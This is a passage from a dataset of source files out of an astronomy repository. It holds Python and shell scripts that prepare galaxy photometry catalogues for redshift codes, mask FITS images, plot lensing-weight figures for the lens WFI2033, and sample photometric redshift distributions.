#data[z_err][data[z_err] == 0.00] = 0.01\n #data[J_err][data[J_err] == 0.00] = 0.01\n #data[H_err][data[H_err] == 0.00] = 0.01\n data[K_err][data[K_err] == 0.00] = 0.01\n fileout = root_original + file[:-4] + \"_forlephare.txt\"\n #str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t specz \\t photoz\"\n str = \"ID \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t K \\t K_err \\t specz \\t photoz\"\n dataout = np.c_[data[id],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[K],data[K_err],data_bpz[0],data_bpz[1]]\n #np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.3f \\t %.2f')\n\n# If I don't require to use Lephare\n#data = np.loadtxt(root_original+file,usecols=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],unpack=True) # ID + mags\ndata = np.loadtxt(root_original+file,usecols=[0,1,2,3,8],unpack=True) # ID + mags\ndata_bpz = np.loadtxt(file1[:-4]+\"_bpz.cat\",usecols=[1],unpack=True)\nfileout = root_original + file[:-4] + \"_forNAOJ.txt\"\n#str = \"GalID \\t z_spec \\t pos0 \\t pos_1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_i \\t photoz\"\nstr = \"GalID \\t z_spec \\t pos0 \\t pos_1 \\t mag_SDSS_i \\t photoz\"\n#dataout = np.c_[data[0],data[1],data[2],data[3],data[4],data[5],data[6],data[11],data_bpz]\n#np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f')\ndataout = np.c_[data[0],data[1],data[2],data[3],data[4],data_bpz]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.7f \\t %.7f \\t %.7f \\t %.2f %.2f')\n\nos.system(\"rm %s\" % (file1[:-4]+\".bpz\"))\nos.system(\"rm %s\" % (file1[:-4]+\".bpz.bak\"))\n#os.system(\"rm %s\" % (file1[:-4]+\"_bpz.cat\"))\nos.system(\"rm %s\" % (file1[:-4]+\".flux_comparison\"))\nos.system(\"rm %s\" % (file1[:-4]+\".probs\"))\nos.system(\"rm %s\" % file1)\nif \"gri\" in file: os.system(\"rm %s\" % (file1[:-4]+'.columns'))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.691428542137146, "alphanum_fraction": 0.7628571391105652, "avg_line_length": 30.727272033691406, "blob_id": "e047e72636413ef4f6e371613d14a74fc0c56582", "content_id": "ff87a670fb2d30a676d51698b6d02d4715e1c86e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 350, "license_type": "no_license", "max_line_length": 62, "num_lines": 11, "path": "/python/image_utilities/mask.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open('gaussswarpWFI2033_F814W_sci.fits')\nweight = fits.open('gaussswarpWFI2033_F814W_sci_wht.fits')\ndatai = image[0].data\ndataw = weight[0].data\ndatai[dataw == 0] = 0\nimage.writeto('gaussswarpWFI2033_F814W_sci.fits',clobber=True)\n\n" }, { "alpha_fraction": 0.5065656304359436, "alphanum_fraction": 0.6087542176246643, "avg_line_length": 36.59493637084961, "blob_id": "69875ad7f22fca7ae85771cf29207907dbb8d805", "content_id": "7ba616c4d57feb3e48f67b5dc992335558b56030", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5940, "license_type": "no_license", "max_line_length": 294, "num_lines": 158, "path": "/python/plot_utilities/bubbles_WFI2033.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Creates figure 4 from Rusu et al. 2017\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import EllipseCollection\n\nplt.clf()\n\ndef plot(ind,px,py,str,mult):\n ax=plt.subplot(4,4,ind, sharex=ax1, sharey=ax1)\n plt.axis([-130, 130, -130, 130])\n #plt.gca().set_aspect('equal', adjustable='box')\n plt.tick_params(axis='both', which='major', labelsize=6)\n if (ind == 10) | (ind == 11) | (ind == 12) | (ind == 13) | (ind == 14):\n plt.xticks(rotation='vertical')\n ax.text(px, py, str, fontsize=fontlabel, color='k',transform=ax.transAxes)\n xx = data[:,ind+2][data[:,2]>maglim2].astype(float)*mult # multiplier to make the bubbles have an appropriate radius\n xx[xx<2]=2 # minimum visible bubble size\n yy = data[:,ind+2][data[:,2]<=maglim2].astype(float)*mult\n yy[yy<2]=2\n plt.scatter((-pix/2 + data[:,0][data[:,2]>maglim2])*scale, (-pix/2 + data[:,1][data[:,2]>maglim2])*scale, s=xx.astype(int), c='black', lw = 0, alpha=0.5) # typically red\n plt.scatter((-pix/2 + data[:,0][data[:,2]<=maglim2])*scale, (-pix/2 + data[:,1][data[:,2]<=maglim2])*scale, s=yy.astype(int), c='black', lw = 0, alpha=0.5) # typically blue\n\nfontabsciss = 9\nfontlabel = 7\nnRows = 4\nnCols = 4\nnPlots = 14\n\nz_s = 1.66\npix = 915 # number of pixels in 4 arcmin\nscale = 240.0 / pix\nmaglim1 = 23 # for plots when I want blue and red points I would use 24\nmaglim2 = 23\n\nx,y,i,classify,z,mstar,mhalo = np.loadtxt(\"/Users/eduardrusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_WFI2033IRACbpz_nobeta.cat\",usecols=[0,1,4,7,8,9,10],unpack=True)\nsep = np.sqrt((x - 457.5)**2 + (y - 457.5)**2) * scale\n\nx = x[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\ny = y[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nz = z[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\ni_ = i[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nsep_ = sep[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nmstar = mstar[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nmhalo = mhalo[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nsep = sep_\ni = i_\n\nwht_1 = np.ones(len(x))\nwht_z = z_s * z - z * z\nwht_M = 10 ** mstar\nwht_M2 = (10 ** mstar) ** 2\nwht_M3 = (10 ** mstar) ** 3\nwht_1r = 1/sep\nwht_zr = wht_z * wht_1r\nwht_Mr = wht_M * wht_1r\nwht_M2r = wht_M2 * wht_1r\nwht_M3r = wht_M3 * wht_1r\nwht_flexion = wht_M * (wht_1r ** 3)\nwht_tidal = wht_M * (wht_1r ** 2)\nwht_SIS = np.sqrt(wht_M) * wht_1r\nwht_SIShalo = np.sqrt(10 ** mhalo) * wht_1r\ndata = np.c_[x,y,i,wht_1,wht_z,wht_M,wht_M2,wht_M3,wht_1r,wht_zr,wht_Mr,wht_M2r,wht_M3r,wht_flexion,wht_tidal,wht_SIS,wht_SIShalo]\n\n# 0 x\n# 1 y\n# 2 i\n# 3 wht_1\n# 4 wht_z\n# 5 wht_M\n# 6 wht_M2\n# 7 wht_M3\n# 8 wht_1r\n# 9 wht_zr\n# 10 wht_Mr\n# 11 wht_M2r\n# 12 wht_M3r\n# 13 wht_flexion\n# 14 wht_tidal\n# 15 wht_SIS\n# 16 wht_SIShalo\n\nplt.clf()\n\nplt.axis([-130, 130, -130, 130])\n\nfig = plt.figure()\nax1 = fig.add_subplot(4,4,1)\nax = plt.subplot(4,4,1, sharex=ax1, sharey=ax1)\nax.set_aspect(1, adjustable='datalim')\n\nfor i in range(14):\n \n if i == 0: plot(i+1,0.9,0.85,\"$1$\",5)\n if i == 1: plot(i+1,0.9,0.85,\"$z$\",10)\n if i == 2: plot(i+1,0.9,0.85,\"$M_\\star$\",1.0/1000000000)\n if i == 3: plot(i+1,0.85,0.85,\"$M^2_\\star$\",1.0/100000000000000000000)\n if i == 4: plot(i+1,0.85,0.85,\"$M^3_\\star$\",1.0/20000000000000000000000000000000)\n if i == 5: plot(i+1,0.8,0.85,\"$1/r$\",200)\n if i == 6: plot(i+1,0.8,0.85,\"$z/r$\",400)\n if i == 7: plot(i+1,0.8,0.85,\"$M_\\star/r$\",1.0/100000000)\n if i == 8: plot(i+1,0.8,0.85,\"$M^2_\\star/r$\",1.0/10000000000000000000)\n if i == 9: plot(i+1,0.8,0.85,\"$M^3_\\star/r$\",1.0/1000000000000000000000000000000)\n if i == 10: plot(i+1,0.8,0.85,\"$M_\\star/r^3$\",1.0/2000000)\n if i == 11: plot(i+1,0.8,0.85,\"$M_\\star/r^2$\",1.0/10000000)\n if i == 12: plot(i+1,0.75,0.85,\"$\\sqrt{M_\\star}/r$\",1.0/500)\n if i == 13: plot(i+1,0.7,0.85,\"$\\sqrt{M_h}/r$\",1.0/10000)\n\n circle120=plt.Circle((0,0),120,color='k',fill=False)\n circle45=plt.Circle((0,0),45,color='k',fill=False)\n fig = plt.gcf()\n fig.gca().add_artist(circle120)\n fig.gca().add_artist(circle45)\n\n# hide the plots with no data in the grid\nax=plt.subplot(4,4,15, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nax.set_frame_on(False)\nax=plt.subplot(4,4,16, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nax.set_frame_on(False)\n\nindex = 1\nfor r in range(1, nRows +1):\n for c in range(1, nCols + 1):\n ax = plt.subplot(nRows, nCols, index, sharex=ax1, sharey=ax1)\n index += 1\n # Turn off y tick labels for all but the first column.\n if ((c != 1) and (index <= nPlots)):\n plt.setp(ax.get_yticklabels(), visible=False)\n #if c == 1:\n #plt.ylabel('arcsec',fontsize=fontabsciss)\n # Turn off x tick lables for all but the bottom plot in each \n # column. \n if ((nPlots - index) >= nCols):\n plt.setp(ax.get_xticklabels(), visible=False)\n #plt.set_aspect('equal')\n #if (index == 15) or (index == 16) or (index == 17) or (index == 18):\n #plt.xlabel('arcsec',fontsize=fontabsciss)\n if index == 15:\n plt.setp(ax.get_yticklabels(), visible=False)\n\nfig.text(0.5, 0.04, 'radius [arcsec]', ha='center', va='center')\nfig.text(0.06, 0.5, 'radius [arcsec]', ha='center', va='center', rotation='vertical')\nplt.subplots_adjust(wspace=0, hspace=0)\n\n#plt.subplots_adjust(left=None, bottom=0.1, right=None, top=0.95, wspace=0.4, hspace=0.6)\n\nplt.savefig('bubbles.png', dpi=500, bbox_inches='tight')\n\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6557376980781555, "alphanum_fraction": 0.7587822079658508, "avg_line_length": 22.72222137451172, "blob_id": "58fb6fc457c4a8094e8ed59c5a36637fb1a5d49f", "content_id": "b56b15f09532099aea86f43b22b3df4166b9fcaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 427, "license_type": "no_license", "max_line_length": 92, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer23.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log23.out\n#PBS -e Log23.err\n#PBS -N 23\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal oneoverr mass3\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 120 23 meds gal oneoverr mass3\n" }, { "alpha_fraction": 0.5164433121681213, "alphanum_fraction": 0.5932573676109314, "avg_line_length": 50.01506042480469, "blob_id": "38b60ee9bc5cb014b57a7c8f9ac648f896241324", "content_id": "1657cac412935a564f41ec0bcf9ce79bcefdab95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16937, "license_type": "no_license", "max_line_length": 682, "num_lines": 332, "path": "/python/catalogue_utilities/photozsampling.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run this code in order to sample from P(z) for the lens catalogue, with or without spectroscopic information. Requires that a necessary .probs file exists in the BPZ folfer, containing P(z) computed with BPZ on a grid z=arange(0.0000,3.5100,0.0100). Also requires that the .pz files exist for each object with z=arange(0.0100,4.0000,0.0100) from a previous EAzY run on a grid z=arange(0.0100,4.00,0.0100). The code then uses a modified version of converttolephare_WFI2033.py and converttolephare_noobs_WFI2033.py in order to produce the input expected by Lephare.\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\nimport time\n\nuseeazy = 1\nsamples = 20\n#file = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n#filebpz = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.probs\"\n#if useeazy == 1: fileeazy = \"/Users/cerusu/GITHUB/eazy-photoz/inputs/OUTPUT/sample_ir/\"\nfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\nfilebpz = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.probs\"\nif useeazy == 1: fileeazy = \"/Users/cerusu/GITHUB/eazy-photoz/inputs/OUTPUT/sample_i/\"\n\n# zeropoint corrections suggested by lephare:\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nKs_corr = +0.06\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94 # computed by LePhare\nH_corr += 1.35\nKs_corr += 1.83\n\n# use the modified version of converttolephare_WFI2033.py:\ndef lephare_noobs(data,fileout,irac):\n\n # a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\n data[u_err][np.abs(data[u_err]) == 99.00] = 1.00\n data[g_err][np.abs(data[g_err]) == 99.00] = 1.00\n data[r_err][np.abs(data[r_err]) == 99.00] = 1.00\n data[i_err][np.abs(data[i_err]) == 99.00] = 1.00\n data[z_err][np.abs(data[z_err]) == 99.00] = 1.00\n data[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\n data[J_err][np.abs(data[J_err]) == 99.00] = 1.00\n data[H_err][np.abs(data[H_err]) == 99.00] = 1.00\n data[Ks_err][np.abs(data[Ks_err]) == 99.00] = 1.00\n\n if irac == False:\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n data[irac1] = -99\n data[irac1_err] = -99\n data[irac2] = -99\n data[irac2_err] = -99\n data[irac3] = -99\n data[irac3_err] = -99\n data[irac4] = -99\n data[irac4_err] = -99\n\n data[u_err][np.abs(data[u]) == 99.0] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n data[z_err][np.abs(data[z]) == 99.0] = -99.0\n data[Y_err][np.abs(data[Y]) == 99.0] = -99.0\n data[J_err][np.abs(data[J]) == 99.0] = -99.0\n data[H_err][np.abs(data[H]) == 99.0] = -99.0\n data[Ks_err][np.abs(data[Ks]) == 99.0] = -99.0\n data[u][np.abs(data[u]) == 99.0] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n data[z][np.abs(data[z]) == 99.0] = -99.0\n data[Y][np.abs(data[Y]) == 99.0] = -99.0\n data[J][np.abs(data[J]) == 99.0] = -99.0\n data[H][np.abs(data[H]) == 99.0] = -99.0\n data[Ks][np.abs(data[Ks]) == 99.0] = -99.0\n\n # apply the corrections\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n data[Y][np.abs(data[Y]) != 99.0] += Y_corr\n data[J][np.abs(data[J]) != 99.0] += J_corr\n data[H][np.abs(data[H]) != 99.0] += H_corr\n data[Ks][np.abs(data[Ks]) != 99.0] += Ks_corr\n\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n data[Y_err][data[Y_err] == 0.00] = 0.01\n data[J_err][data[J_err] == 0.00] = 0.01\n data[H_err][data[H_err] == 0.00] = 0.01\n data[Ks_err][data[Ks_err] == 0.00] = 0.01\n\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t Ks_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[Ks],data[Ks_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[redshift]]\n np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n# use the modified version of converttolephare_noobs_WFI2033.py:\ndef lephare(data,fileout,irac):\n if irac == False:\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n data[irac1] = -99\n data[irac1_err] = -99\n data[irac2] = -99\n data[irac2_err] = -99\n data[irac3] = -99\n data[irac3_err] = -99\n data[irac4] = -99\n data[irac4_err] = -99\n\n # a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\n data[u_err][np.abs(data[u_err]) == 99.00] = 1.00\n data[g_err][np.abs(data[g_err]) == 99.00] = 1.00\n data[r_err][np.abs(data[r_err]) == 99.00] = 1.00\n data[i_err][np.abs(data[i_err]) == 99.00] = 1.00\n data[z_err][np.abs(data[z_err]) == 99.00] = 1.00\n data[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\n data[J_err][np.abs(data[J_err]) == 99.00] = 1.00\n data[H_err][np.abs(data[H_err]) == 99.00] = 1.00\n data[Ks_err][np.abs(data[Ks_err]) == 99.00] = 1.00\n\n # apply the corrections\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n data[Y][np.abs(data[Y]) != 99.0] += Y_corr\n data[J][np.abs(data[J]) != 99.0] += J_corr\n data[H][np.abs(data[H]) != 99.0] += H_corr\n data[Ks][np.abs(data[Ks]) != 99.0] += Ks_corr\n\n # correct the limiting mags\n data[u_err][np.abs(data[u]) == 99.0] += u_corr\n data[g_err][np.abs(data[g]) == 99.0] += g_corr\n data[r_err][np.abs(data[r]) == 99.0] += r_corr\n data[i_err][np.abs(data[i]) == 99.0] += i_corr\n data[z_err][np.abs(data[z]) == 99.0] += z_corr\n data[Y_err][np.abs(data[Y]) == 99.0] += Y_corr\n data[J_err][np.abs(data[J]) == 99.0] += J_corr\n data[H_err][np.abs(data[H]) == 99.0] += H_corr\n data[Ks_err][np.abs(data[Ks]) == 99.0] += Ks_corr\n\n # the format for nondetections is error=-1.0 and magnitude at 1-sigma\n data[u][np.abs(data[u]) == 99.0] = data[u_err][np.abs(data[u]) == 99.0]\n data[g][np.abs(data[g]) == 99.0] = data[g_err][np.abs(data[g]) == 99.0]\n data[r][np.abs(data[r]) == 99.0] = data[r_err][np.abs(data[r]) == 99.0]\n data[i][np.abs(data[i]) == 99.0] = data[i_err][np.abs(data[i]) == 99.0]\n data[z][np.abs(data[z]) == 99.0] = data[z_err][np.abs(data[z]) == 99.0]\n data[Y][np.abs(data[Y]) == 99.0] = data[Y_err][np.abs(data[Y]) == 99.0]\n data[J][np.abs(data[J]) == 99.0] = data[J_err][np.abs(data[J]) == 99.0]\n data[H][np.abs(data[H]) == 99.0] = data[H_err][np.abs(data[H]) == 99.0]\n data[Ks][np.abs(data[Ks]) == 99.0] = data[Ks_err][np.abs(data[Ks]) == 99.0]\n data[u_err][np.abs(data[u_err]) > 20] = -1.0\n data[g_err][np.abs(data[g_err]) > 20] = -1.0\n data[r_err][np.abs(data[r_err]) > 20] = -1.0\n data[i_err][np.abs(data[i_err]) > 20] = -1.0\n data[z_err][np.abs(data[z_err]) > 20] = -1.0\n data[Y_err][np.abs(data[Y_err]) > 20] = -1.0\n data[J_err][np.abs(data[J_err]) > 20] = -1.0\n data[H_err][np.abs(data[H_err]) > 20] = -1.0\n data[Ks_err][np.abs(data[Ks_err]) > 20] = -1.0\n\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n data[Y_err][data[Y_err] == 0.00] = 0.01\n data[J_err][data[J_err] == 0.00] = 0.01\n data[H_err][data[H_err] == 0.00] = 0.01\n data[Ks_err][data[Ks_err] == 0.00] = 0.01\n\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t Ks_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[Ks],data[Ks_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[redshift]]\n np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n\n###################\n# sampling from BPZ:\n\npdz = np.loadtxt(filebpz, unpack=False)\nsamplez = np.zeros((pdz.shape[0],samples)) # sample 9 times, the 10th will be the original best-fit\nzgridint = np.arange(350) # integers corresponding to z=arange(0.0000,3.5100,0.0100)\n\nid = 8\nspec = 40 # -1: no spec data; -2: spec star; >0: available spec\nu = 9\nu_err = 10\ng = 11\ng_err = 12\nr = 13\nr_err = 14\ni = 15\ni_err = 16\nz = 17\nz_err = 18\nY = 19\nY_err = 20\nJ = 21\nJ_err = 22\nH = 23\nH_err = 24\nKs = 25\nKs_err = 26\nirac_1 = 74\nirac_1_err = 75\nirac_2 = 76\nirac_2_err = 77\nirac_3 = 78\nirac_3_err = 79\nirac_4 = 80\nirac_4_err = 81\n\nphot = np.loadtxt(file, usecols = [id,spec,u,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,Ks,Ks_err,irac_1,irac_1_err,irac_2,irac_2_err,irac_3,irac_3_err,irac_4,irac_4_err], unpack = False)\n\n# now relabel the columns:\nid = 0\nspec = 1\nu = 2\nu_err = 3\ng = 4\ng_err = 5\nr = 6\nr_err = 7\ni = 8\ni_err = 9\nz = 10\nz_err = 11\nY = 12\nY_err = 13\nJ = 14\nJ_err = 15\nH = 16\nH_err = 17\nKs = 18\nKs_err = 19\nirac1 = 20\nirac1_err = 21\nirac2 = 22\nirac2_err = 23\nirac3 = 24\nirac3_err = 25\nirac4 = 26\nirac4_err = 27\nredshift = 28 # the redshift needed by lephare\n\nfor k in range(pdz.shape[0]): # for each galaxy\n if np.sum(pdz[k][1:]) != 1: # not all BPZ probabilities are perfectly normalized\n l = 1\n while pdz[k][l] != 0: l += 1\n pdz[k][l] = 1 - np.sum(pdz[k][1:]) # the first instance where the probability is zero, add the require offset to have a perfect normalization\n custm = stats.rv_discrete(name='custm', values=(zgridint, pdz[k][1:])) # ignore the first column, which is the ID\n sample = custm.rvs(size = samples)\n if phot[k][spec] < 0: # if no spectrum is available or if the object is a spectroscopic star\n samplez[k] = np.array([np.max([0.01 * sample[0],0.01]),np.max([0.01 * sample[1],0.01]),np.max([0.01 * sample[2],0.01]),np.max([0.01 * sample[3],0.01]),np.max([0.01 * sample[4],0.01]),np.max([0.01 * sample[5],0.01]),np.max([0.01 * sample[6],0.01]),np.max([0.01 * sample[7],0.01]),np.max([0.01 * sample[8],0.01]),np.max([0.01 * sample[9],0.01]),np.max([0.01 * sample[10],0.01]),np.max([0.01 * sample[11],0.01]),np.max([0.01 * sample[12],0.01]),np.max([0.01 * sample[13],0.01]),np.max([0.01 * sample[14],0.01]),np.max([0.01 * sample[15],0.01]),np.max([0.01 * sample[16],0.01]),np.max([0.01 * sample[17],0.01]),np.max([0.01 * sample[18],0.01]),np.max([0.01 * sample[19],0.01])])\n # because 0.01 is the redshift step; the minimum redshift accepted by LePhare is 0.01\n else:\n samplez[k] = np.array([phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec]])\n for j in range(phot.shape[0]): # match the two files by ID\n if pdz[k][0] == phot[j][0]:\n if k != 0:\n lephdata = np.c_[lephdata,phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j]]\n else:\n lephdata = np.c_[phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j]]\n\nsamplez = samplez.reshape(samplez.size)\n#print np.shape(lephdata)\nlephdata = np.r_[lephdata,samplez.reshape(1,samplez.size)]\n#print np.shape(lephdata)\n\ndata = np.copy(lephdata)\nlephare(data,file[:-4] + \"_bpzsample.cat\",True)\ndata = np.copy(lephdata)\nlephare(data,file[:-4] + \"_noIRACbpzsample.cat\",False)\ndata = np.copy(lephdata)\nlephare_noobs(data,file[:-4] + \"_bpzsample_noobs.cat\",True)\ndata = np.copy(lephdata)\nlephare_noobs(data,file[:-4] + \"_noIRACbpzsample_noobs.cat\",False)\n\n\n###################\n# sampling from EAzY:\nif useeazy == 1:\n del lephdata\n lst = [x for x in os.listdir('%s' %fileeazy) if ('.pz' in x)]\n samplez = np.zeros((len(lst),samples)) # sample 9 times\n\n gal = np.zeros(len(lst)) # array of all the ID of galaxies\n for k in range(len(lst)):\n gal[k] = int(lst[k].strip('.pz'))\n gal = gal.astype(int)\n\n zgridint = np.arange(400)\n nr = 0\n for k in range(phot.shape[0]):\n if int(phot[k][0]) in gal:\n pdz = np.loadtxt('%s%s.pz' % (fileeazy,int(phot[k][0])), usecols = [3], unpack=True)\n pdz = pdz/np.sum(pdz) # it needs to be normalized\n custm = stats.rv_discrete(name='custm', values=(zgridint, pdz)) # ignore the first column, which is the ID\n sample = custm.rvs(size = samples)\n if phot[k][spec] < 0: # if no spectrum is available or if the object is a spectroscopic star\n samplez[nr] = np.array([0.01 + 0.01 * sample[0],0.01 + 0.01 * sample[1],0.01 + 0.01 * sample[2],0.01 + 0.01 * sample[3],0.01 + 0.01 * sample[4],0.01 + 0.01 * sample[5],0.01 + 0.01 * sample[6],0.01 + 0.01 * sample[7],0.01 + 